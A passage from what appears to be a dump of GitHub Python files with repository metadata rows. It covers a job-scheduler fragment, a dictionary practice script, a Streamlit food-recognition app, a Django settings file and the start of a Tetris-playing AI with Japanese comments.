                self.Utility.buildResponse(myResponse, self.Global.UnSuccess, 'Cound not find job details for job {job}'.format(job = myJobId))
            return myResponse
        except Exception as err:
            myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
            self.Utility.buildResponse(myResponse, self.Global.UnSuccess,myErrorMsg)
            #raise err # will raise the error so this can be logged by scheduler as an error occurred in processing job
            return myResponse

    def processJobFinishEvent(self, jobIdArg, execDetailsArg):
        '''
        1. Mark job completed (update failure cnt and total count and consc fail count, lastrunstatus) in ScheduledJobs
        2. Update ScheduledJobsRunlog container
        '''
        try:
            # initializing
            myResponse = self.Utility.getResponseTemplate()
            myJobId = self.Utility.getACopy(jobIdArg)
            myExecDetails = execDetailsArg
            myJobStatus = self.Global.NextJobRun
            self.logger.debug('arg [{arg}] received'.format(arg=myJobId))
            myJobDetailsFromDb = self.getJobInfoFromDb(myJobId)['Data']
            if myJobDetailsFromDb:
                self.logger.debug('Job details found, proceeding with finish event')
                myJobCriteria = 'JobId = %s' %repr(myJobId)
                myCurrentSeqForJob = self.getCurrentSeqForJob(myJobId)
                myJobRunCriteria = ' JobId = %s and Seq = %s ' %(repr(myJobId), myCurrentSeqForJob)
                self.logger.debug('Job criteria {criteria}'.format(criteria = myJobCriteria))
                self.logger.debug('Job criteria with seq {criteria}'.format(criteria = myJobRunCriteria))
                myJobDetailsFromSched = self.getAJobDetail(myJobId)
                # Updating execution details in ScheduledJobsRunLog
                self.logger.debug('udating statistics of this run')
                myDbResult = self.db.processDbRequest(operation = 'change', container = 'ScheduledJobsRunLog', \
                    dataDict={
                        'Status': myExecDetails['Status'], 'ElapsedSeconds':myExecDetails['Data']['ElapsedSecs'],
                        'ExecutionCompleted': self.Utility.getCurrentTime(), 'ExecutionDetail': json.dumps(myExecDetails['Data'])
                    }, criteria = myJobRunCriteria, commitWork=True )
                self.logger.debug('ScheduledJobsRunLog: db results >> {results}'.format(results = myDbResult))
                # Updating execution details in ScheduledJobs
                #if myExecDetails['Status'] == self.Global.Success:
                # if success, reset consecfailcnt to 0, increment totalrun by 1 and update next run
                myElapsedStats = self.db.executeDynamicSql(\
                    operation = 'fetch', \
                    sql_text = 'select min(ElapsedSeconds) "Min", max(ElapsedSeconds) "Max", avg(ElapsedSeconds) "Avg" from ScheduledJobsRunLog')
                self.logger.debug('Elapsed Stats: {stats}'.format(stats = myElapsedStats))
                # NOTE(review): 'MaxElapsedSecs' is populated from ['Min'] — almost
                # certainly should be ['Max'].  Also the 'NextRun' strftime format
                # contains a stray '%' ('%Y-%m-%d% %H:%M:%S') — confirm both.
                myDbResult = self.db.processDbRequest(operation='change', container='ScheduledJobs', \
                    dataDict={
                        'Status': myJobStatus, 'LastRunStatus': myExecDetails['Status'], 'TotalRun' : myJobDetailsFromDb[0]['TotalRun'] + 1,
                        'NextRun' : myJobDetailsFromSched['next_run_time'].strftime('%Y-%m-%d% %H:%M:%S'), 'LatConsecFailCnt' : 0,
                        'MinElapsedSecs' : myElapsedStats['Data'][0]['Min'], 'MaxElapsedSecs' : myElapsedStats['Data'][0]['Min'] ,
                        'AvgElapsedSecs' : myElapsedStats['Data'][0]['Avg']
                    }, criteria = myJobCriteria, commitWork=True )
                self.logger.debug('ScheduledJobs: last stats update >> {result}'.format(result = myDbResult))
                #self.Utility.buildResponse(myResponse, self.Global.Success,self.Global.Success)
                '''
                else:
                    # process job was unsuccessful
                    if myJobDetailsFromDb[0]['LatConsecFailCnt'] >= self.Global.SchedConsecFailCntThreshold:
                        myJobStatus = self.Global.SuspendMode
                        self.logger.info('suspending job {job}'.format(job=myJobId))
                        self.suspendJob(myJobId)
                    myDbResult = self.db.processDbRequest(operation='change', container='ScheduledJobs', \
                        dataDict={
                            'Status': myJobStatus, 'LastRunStatus': myExecDetails['Status'], 'TotalRun' : myJobDetailsFromDb[0]['TotalRun'] + 1,
                            'next_run' : myJobDetailsFromSched['next_run_time'], 'LatConsecFailCnt' : myJobDetailsFromDb[0]['LatConsecFailCnt'] + 1,
                            'TotalFailure' : myJobDetailsFromDb[0]['TotalFailure' + 1]
                        }, criteria = myJobCriteria, commitWork=True )
                    # will suspend the job if total failure count has been reached beyond Total consecutive failure threshold
                    self.Utility.buildResponse(myResponse, self.Global.UnSuccess,self.Global.UnSuccess)
                    raise processJobError(myExecDetails['Message'])
                '''
            self.Utility.buildResponse(myResponse, self.Global.Success,self.Global.Success)
            return myResponse
        except Exception as err:
            myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
            self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
            self.Utility.buildResponse(myResponse, self.Global.UnSuccess, myErrorMsg)
            return myResponse
"oracledba.usa88@gmail.com"
] | oracledba.usa88@gmail.com |
817b4cde609c42a165cc9ddc8e3ece7e7f5b8001 | 3ca80a9a55652e21a7c69008842e86ac72f744d3 | /real_python_courses/Python_Dict.py | 53c563d563f4eb3a36a257c673e0ac123587d57a | [] | no_license | pshapard/New_projects | 29ef9f7793e137124d33ca461e3dd686023789c5 | 8cf0e244cde07dd0f750de6a064deba970c0cf7a | refs/heads/master | 2022-02-11T06:13:35.278903 | 2022-01-25T19:21:14 | 2022-01-25T19:21:14 | 253,964,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | #
class PrintThis(object):
    """Tiny helper that prints visual separator lines."""

    def __init__(self):
        """No state to initialize."""
        pass

    def HashTag120(self):
        """Print a separator line made of 120 '#' characters."""
        print('#' * 120)
# Practice script demonstrating dictionary iteration, mutation and comprehensions.
printme = PrintThis()
printme.HashTag120()
my_dict = {'color': 'red', 'fruit': 'apple', 'species':'dog'}
my_dict['color']
print("Iterate over a dictionary and get the KEY:VALUE pair")
for key, value in my_dict.items():
    print(key, '-->', value)
#This is a built-in python function
#print(vars())
#print(locals())
#print(dir(my_dict))
#If you want to access just the value in a dict do this
print("If you want to access just the VALUE in a dict do this")
for value in my_dict.values():
    print(value)
print("If you want to access just the KEY in a dict do this")
for key in my_dict.keys():
    print(key)
print(my_dict.values())
print(my_dict.keys())
print("This will print out the item in each item".upper())
for item in my_dict.items():
    print(item[1])
print("This will print out the key in each item".capitalize())
for item in my_dict.items():
    print(item[0])
prices = {'brcm':'25.34', 'hpe':'14.75', 'msft':'155'}
for key, value in prices.items():
    print(key, '-->', value)
prices['brcm'] = 33.52
print('The price of brcm went up')
for key, value in prices.items():
    print(key, '-->', value)
prices['Intel'] = 75.47
print('Added Intel stock to the dictionary')
for key, value in prices.items():
    print(key, '-->', value)
printme.HashTag120()
incomes = {'Patrick': 120000, 'Beatriz': 75000, 'Joseph': 45000}
total_incomes = 0
for key, income in incomes.items():
    total_incomes += income
print("The total income of the family {:,}" .format(total_incomes, '.2d'))
print(f'The total income of the family {total_incomes:,}')
# BUG FIX: .upper was referenced without calling it, which printed the bound
# method object instead of the uppercased title (every other title line calls it).
print('Dictionary comprehension'.upper())
colors = ['Red','Blue','Orange']
objects = ['Car','Blouse','Tophat']
print(colors)
print(objects)
print('Example of taking two lists, using the zip(), and creating a dictionary using dict comprehension\n')
new_dict = {key: value for key, value in zip(colors, objects)}
print(new_dict)
print('Using the new_dict, we\'ll a dict comprehension to swap key:value pair')
new_dict2 = {value: key for key, value in new_dict.items()}
print(f'This is the new dictionary: {new_dict2}')
next_dict = {key: value for key, value in new_dict.items() if key == 'Red'}
print(next_dict)
printme.HashTag120()
dict1 = vars()
for key, value in list(dict1.items()):
    print(key, '-->' ,value)
| [
"pshapard@outlook.com"
] | pshapard@outlook.com |
c70b7c8d785d5cea2c74ae6cb5e0d76bfb3512c5 | e2b4da672e778ecda0c11677f40da2b20f2bb6a9 | /app.py | 209211213fe131134faa02aa76097db4178df4b7 | [] | no_license | luongtruong77/food_130_recognition | cc183316d09eed4152e1cf951ba28c4334677cb9 | c6a683a953b90d113290630c5825df8fba223cf7 | refs/heads/main | 2023-07-17T22:48:59.299873 | 2021-08-26T00:09:04 | 2021-08-26T00:09:04 | 397,708,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,613 | py | import tensorflow as tf
import streamlit as st
def load_and_prep_image(filename, img_shape=380, scale=True):
    """
    Reads in an image from filename, turns it into a tensor and reshapes into
    (img_shape, img_shape, 3).

    Parameters
    ----------
    filename (str): string filename of target image (JPEG — decoded with
        tf.image.decode_jpeg)
    img_shape (int): size to resize target image to, default 380
    scale (bool): whether to scale pixel values to range(0, 1), default True

    Returns
    -------
    tf.Tensor of shape (img_shape, img_shape, 3); values divided by 255
    when *scale* is True, otherwise the raw resized pixel values.
    """
    # Read in the image
    img = tf.io.read_file(filename)
    # Decode it into a tensor
    img = tf.image.decode_jpeg(img)
    # Resize the image
    img = tf.image.resize(img, [img_shape, img_shape])
    if scale:
        # Rescale the image (get all values between 0 and 1)
        return img / 255.
    else:
        return img
class_names = ['apple_pie',
'baby_back_ribs',
'baklava',
'bánh_bèo',
'bánh_bột_lọc',
'bánh_căn',
'bánh_canh',
'bánh_chưng',
'bánh_cuốn',
'bánh_đúc',
'bánh_giò',
'bánh_khọt',
'bánh_mì',
'bánh_pía',
'bánh_tét',
'bánh_tráng_nướng',
'bánh_xèo',
'beef_carpaccio',
'beef_tartare',
'beet_salad',
'beignets',
'bibimbap',
'bread_pudding',
'breakfast_burrito',
'bruschetta',
'bún_bò_huế',
'bún_đậu_mắm_tôm',
'bún_mắm',
'bún_riêu',
'bún_thịt_nướng',
'cá_kho_tộ',
'caesar_salad',
'canh_chua',
'cannoli',
'cao_lầu',
'caprese_salad',
'carrot_cake',
'ceviche',
'cháo_lòng',
'cheese_plate',
'cheesecake',
'chicken_curry',
'chicken_quesadilla',
'chicken_wings',
'chocolate_cake',
'chocolate_mousse',
'churros',
'clam_chowder',
'club_sandwich',
'cơm_tấm',
'crab_cakes',
'creme_brulee',
'croque_madame',
'cup_cakes',
'deviled_eggs',
'donuts',
'dumplings',
'edamame',
'eggs_benedict',
'escargots',
'falafel',
'filet_mignon',
'fish_and_chips',
'foie_gras',
'french_fries',
'french_onion_soup',
'french_toast',
'fried_calamari',
'fried_rice',
'frozen_yogurt',
'garlic_bread',
'gnocchi',
'gỏi_cuốn',
'greek_salad',
'grilled_cheese_sandwich',
'grilled_salmon',
'guacamole',
'gyoza',
'hamburger',
'hot_and_sour_soup',
'hot_dog',
'hủ_tiếu',
'huevos_rancheros',
'hummus',
'ice_cream',
'lasagna',
'lobster_bisque',
'lobster_roll_sandwich',
'macaroni_and_cheese',
'macarons',
'mì_quảng',
'miso_soup',
'mussels',
'nachos',
'nem_chua',
'omelette',
'onion_rings',
'oysters',
'pad_thai',
'paella',
'pancakes',
'panna_cotta',
'peking_duck',
'phở',
'pizza',
'pork_chop',
'poutine',
'prime_rib',
'pulled_pork_sandwich',
'ramen',
'ravioli',
'red_velvet_cake',
'risotto',
'samosa',
'sashimi',
'scallops',
'seaweed_salad',
'shrimp_and_grits',
'spaghetti_bolognese',
'spaghetti_carbonara',
'spring_rolls',
'steak',
'strawberry_shortcake',
'sushi',
'tacos',
'takoyaki',
'tiramisu',
'tuna_tartare',
'waffles',
'xôi_xéo']
st.markdown("<h1 style='text-align: center; color: black;'>Food Recognition App!</h1>",
unsafe_allow_html=True)
st.write('---')
st.write('This app is capable of recognizing 130 kinds of food with over 30 kinds of Vietnamese foods '
'(including **phở, gỏi cuốn, bánh bèo, bánh mì, hủ tiếu, bánh xèo**, etc). ')
st.write('This app is created by [Steven Truong](https://www.linkedin.com/in/luongtruong77/).')
st.write('The source codes can be found [here](https://github.com/luongtruong77/food_130_recognition)')
st.write('---')
# @st.cache(hash_funcs={tf.keras.utils.object_identity.ObjectIdentityDictionary: my_hash_func})
def model_loading(link):
    """Load and return a saved Keras model from *link* (path to a saved model / .h5 file)."""
    model = tf.keras.models.load_model(link)
    return model
loaded_model = model_loading(link="models/model.h5")
uploaded_file = st.file_uploader("Choose a file or use the device's camera:")
if uploaded_file is not None:
    # Persist the upload to disk so load_and_prep_image can read it by filename.
    bytes_data = uploaded_file.read()
    st.image(bytes_data, use_column_width=True)
    with open('./image.jpg', 'wb') as f:
        f.write(bytes_data)
    # Make predictions on custom food images
    img = load_and_prep_image("image.jpg", scale=False) # load in target image and turn it into tensor
    pred_prob = loaded_model.predict(
        tf.expand_dims(img, axis=0)) # make prediction on image with shape [None, 224, 224, 3]
    pred_class = " ".join(class_names[pred_prob.argmax()].split("_")) # find the predicted class label
    # Second-most-likely class: its probability and its index in the original vector.
    second_pred_prob = sorted(pred_prob[0])[-2]
    second_pred_index = list(pred_prob[0]).index(sorted(pred_prob[0])[-2])
    second_pred_class_name = " ".join(class_names[second_pred_index].split("_"))
    # Show the runner-up only when the model is not very confident.
    if pred_prob.max() <= 0.95:
        st.write(
            f"**Prediction:** {pred_prob.max() * 100:.2f}% {pred_class}, {second_pred_prob * 100:.2f}% {second_pred_class_name} ")
    else:
        st.write(
            f"**Prediction:** {pred_prob.max() * 100:.2f}% {pred_class}.")
| [
"tqluong77@gmail.com"
] | tqluong77@gmail.com |
3d60ed7e99f218433773775f5e56aec334e9fb8d | 52b2e3470cd4b91975b2e1caed8d1c93c20e5d05 | /tools/parsertools/testbuffer.py | f8f8dd1bfbe81182baf42dae60fe879de314da4a | [] | no_license | xprime480/projects | c2f9a82bbe91e00859568dc27ae17c3b5dd873e3 | 3c5eb2d53bd7fa198edbe27d842ee5b5ff56e226 | refs/heads/master | 2020-04-27T03:51:29.456979 | 2019-04-12T14:34:39 | 2019-04-12T14:34:39 | 174,037,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py |
class TestBuffer(object):
    """Replayable token stream used to feed a parser in tests."""

    def __init__(self, tokens):
        """Snapshot *tokens* and start reading from the front."""
        self.tokens = tokens[:]
        self.size = len(self.tokens)
        self.index = 0

    def get(self):
        """Consume and return the next token; None when exhausted.

        A falsy token (e.g. '' or 0) is returned but NOT consumed,
        matching the original semantics.
        """
        token = self.peek()
        if token:
            self.index += 1
        return token

    def peek(self):
        """Return the next token without consuming it (None at end)."""
        if self.index < self.size:
            return self.tokens[self.index]
        return None
| [
"mi.davis@sap.com"
] | mi.davis@sap.com |
278269ce0336906a35c4a57f21cb02693fa64334 | 28b098b11832f1f0d06afe498cf76a64a9a90750 | /backend/thejacobblog_24666/settings.py | 53c464969db683b34de86ff561e4bcb4b06f15ed | [] | no_license | crowdbotics-apps/thejacobblog-24666 | 4fa5ca6c37a47bfcfd325a2a421a6ca0f53ad9f6 | d53ba1565a19577f391422d90f41e8ab6a7f9eb0 | refs/heads/master | 2023-03-18T22:33:56.488920 | 2021-02-22T23:34:51 | 2021-02-22T23:34:51 | 341,368,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,041 | py | """
Django settings for thejacobblog_24666 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'thejacobblog_24666.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'thejacobblog_24666.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
edcfb344971d821721006300334822b6d4a62d2e | 22e36523e8355d5c50b28610b5c280429259087b | /omega.py | 353138bc2ba21684b67f8350d9cdd74257397bbe | [] | no_license | jumdtw/foresttetris | 5a1e9147ae28ab1ec3d9179bcb5cab41be4d488a | 32a5bafe8710277e2d6d867909e76d3a7d9bcb49 | refs/heads/master | 2023-03-01T17:52:40.500749 | 2021-02-18T13:39:53 | 2021-02-18T13:39:53 | 307,649,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,797 | py | import tetris
import copy
import random
import os
import json
'''
学習順序
1,手とる
2,盤面を毎回評価する。その際の 特徴量は各ゲーム単位ですべて保存する。
3,ゲームが終了したら(ゲームオーバーか50ライン消し終わったら)、その保存した特徴量群とスコアを紐づけて保存する
4,1000ゲーム分くらいたまったら、スコアを比較して上位100位を学習させる(もしくは特徴量数で決める)
5,やったね。
'''
class Omegamap:
    """One node in a chain of target placements guiding a mino to its goal.

    Each node records a destination (x, y, rotation angle) plus the extra
    key inputs (side moves / spins, as tetris.KEY_* values) needed so the
    simple drop controller can finish the placement from directly above.
    ``map['next']`` links to the following node, or is 0 when this node
    is the last one in the chain.
    """

    def __init__(self, x, y, ang, move):
        """Create a node for destination (*x*, *y*) at rotation *ang* with
        pre-drop inputs *move* (a list of tetris.KEY_* values)."""
        self.map = {
            'desx': x,
            'desy': y,
            'desang': ang,
            'desmove': move,
            'next': 0,
        }

    def add_next(self, x, y, ang, move):
        """Append a follow-up destination node after this one."""
        self.map['next'] = Omegamap(x, y, ang, move)
class Omegaplayer:
def __init__(self):
# 予測盤面生成のためにomega用のミノとfieldを生成
self.omegamino = tetris.Mino()
self.field = []
# minotypeが変わったか否かで盤面の生成を開始するので、初期値は適当に大きい値を入れる。
self.omegamino.minotype = [255]
# このリストに最適解のミノの配置を記録する。
# x, y, angの情報が入っいる
self.posminolist = [[1,1,1]]
# 計算中にスレッドに入られると困るので
self.calcflag = False
# ミノの切り替わりを検知
def cmp_map(self, cmpfield, dx, dy, angle):
if len(self.field) <= 0:
return True
self.omegamino.dmx = dx
self.omegamino.dmy = dy
self.omegamino.minoangle = angle
self.omegamino.delete(cmpfield)
for x, cf in enumerate(cmpfield):
if not cf == self.field[x]:
return True
return False
# 設置可能なミノのx, y, angをサーチ.設置可能な場所探してるだけなので配置不可な可能性はある。
def search_map(self):
poslist = []
# アングル4種類
for ang in range(4):
y = 0
while y < tetris.FIELD_HEIGHT:
for x in range(tetris.FIELD_WIDTH):
if self.omegamino.hitcheck(self.field, y, x, self.omegamino.minotype[0], ang):
if not self.omegamino.hitcheck(self.field, y+1, x, self.omegamino.minotype[0], ang):
poslist.append(Omegamap(x, y, ang, []))
y+=1
rlist = self.placement_map(poslist)
return rlist
# Trueなら上からそのまま刺せる、Falseなら横移動が必要かそもそも設置が無理
def drop_judge(self, field, minotype, minoang, mx, my):
widthlist = [
# x = 0
99,
# x = 1
99,
# x = 2
99,
# x = 3
99
]
for y in range(4):
for x in range(4):
if self.omegamino.minodate[minotype][minoang][y][x] >= 1:
# 横幅とそのピクセルの位置を把握
if widthlist[x] >= y:
widthlist[x] = y
for i,q in enumerate(widthlist):
if mx+i >= tetris.FIELD_WIDTH+1:
continue
if q>=99:
continue
bufy = my + q - 1
while bufy >=0:
if not field[bufy][mx+i] == 0:
return False
bufy-=1
return True
# spin 必要な場合はtrue, いらない場合はfalse
def xspin_judge(self, field, minotype, minoang, mx, my):
xspinX=0
xspinY=1
c=0
# xspin[minotype][minoang][mx or my][index]
xspin = [
# tspin
[
# ang = 0
[
[0,0,2,2],
[0,2,0,2]
],
# ang = 1
[
[0,0,2,2],
[0,2,0,2]
],
# ang = 2
[
[0,0,2,2],
[0,2,0,2]
],
# ang = 3
[
[0,0,2,2],
[0,2,0,2]
],
],
# ispin 存在しない
[],
# ospin 存在しない
[],
# Lspin
[
[
# 必要個数が3つなので同じものをかぶせて4回に統一している
[0,0,0,2],
[0,0,2,2]
],
[
[0,2,0,0],
[0,0,2,2]
],
[
[0,2,2,2],
[0,0,2,2]
],
[
[2,2,0,2],
[0,0,2,2]
],
],
# Jspin
[
[
# 必要個数が3つなので同じものをかぶせて4回に統一している
[2,2,0,2],
[0,0,2,2]
],
[
[0,0,0,2],
[0,0,2,2]
],
[
[0,2,0,0],
[0,0,2,2]
],
[
[0,2,2,2],
[0,0,2,2]
],
],
# Sspin
[
[
# 必要個数が2つなので同じものをかぶせて4回に統一している
[0,0,2,2],
[0,0,1,1]
],
[
[2,2,1,1],
[0,0,2,2]
],
[
[0,0,2,2],
[1,1,2,2]
],
[
[1,1,0,0],
[0,0,2,2]
],
],
# Zspin
[
[
# 必要個数が2つなので同じものをかぶせて4回に統一している
[2,2,0,0],
[0,0,1,1]
],
[
[1,1,2,2],
[0,0,2,2]
],
[
[2,2,0,0],
[1,1,2,2]
],
[
[0,0,1,1],
[0,0,2,2]
],
],
]
# T,I,O,L,J,S,Z
judge_count = [3,99,99,3,3,2,2]
for q in range(4):
if minotype==tetris.MINO_O or minotype==tetris.MINO_I:
continue
bufx = mx + xspin[minotype][minoang][xspinX][q]
bufy = my + xspin[minotype][minoang][xspinY][q]
if (bufx >=tetris.FIELD_WIDTH+1 or bufx <= 0) or (bufy >= tetris.FIELD_HEIGHT or bufy <= 0):
continue
if field[bufy][bufx] >= 1:
c+=1
if c >= judge_count[minotype]:
return True
return False
# search_mapして得られた設置可能x,y,angを逆算して配置可能か調べる
def placement_map(self, poslist):
rlist = []
pid = 0
# [x, y, ang]
for p in poslist:
# 上から刺せるかをまず確認する。
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"], p.map['desy']):
rlist.append(p)
continue
# 横移動させて上からさせないかを確認
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+1, p.map['desy']):
p.map["desx"] = p.map["desx"] + 1
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+2, p.map['desy']):
p.map["desx"] = p.map["desx"] + 2
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+1, p.map['desy']):
p.map["desx"] = p.map["desx"] + 3
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+2, p.map['desy']):
p.map["desx"] = p.map["desx"] + 4
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-1, p.map['desy']):
